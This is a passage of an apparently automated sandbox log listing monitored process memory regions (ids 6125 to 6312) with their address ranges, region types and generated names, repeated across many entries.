0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6129 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6130 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6131 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6170 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6171 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6211 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6212 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6238 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6239 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6240 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6241 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6257 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6258 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6259 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6260 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6261 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6277 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6278 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6279 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6280 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6283 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6284 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6285 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6288 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6289 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6292 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6293 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6297 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6298 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6300 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6301 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6302 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6303 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6304 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6305 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6306 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6307 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6308 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6309 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6310 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6311 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6312 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 